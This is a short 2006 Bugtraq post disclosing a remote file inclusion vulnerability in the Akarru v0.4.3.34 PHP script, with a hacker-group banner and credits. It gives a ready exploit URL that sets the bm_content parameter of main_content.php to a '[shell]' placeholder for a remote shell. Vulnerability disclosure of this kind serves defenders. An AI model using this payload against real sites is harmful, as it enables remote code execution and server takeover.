
Date: 6 Sep 2006 11:39:37 -0000
From: erne@...ealizm.com
To: bugtraq@...urityfocus.com
Subject: Akarru rfi

####  ####  ##   #  ####
#     #  #  # #  #  #
###   ####  #  # #  ###
#     # #   #   ##  #
####  #  #  #    #  ####

# ERNE ---- ERNEAL&#304;ZM ---- BU ASK BiTMEZ----

# Akarru v0.4.3.34 - Remote File Include Vulnerabilities

# site    : http://www.comscripts.com/jump.php?action=script&id=2006

# Script  :  Akarru v0.4.3.34

# Credits : ERNE

# Contact : erne@...ealizm.com  and irc.gigachat.net #kurdhack

# Thanks  : B0tan, FearLesS, Liz0zim, EntRiKa, Dj_Remix, Di_Lejyoner

# Vulnerable :

     http://www.site.com/[path]/akarru.gui/main_content.php?bm_content=[shell]
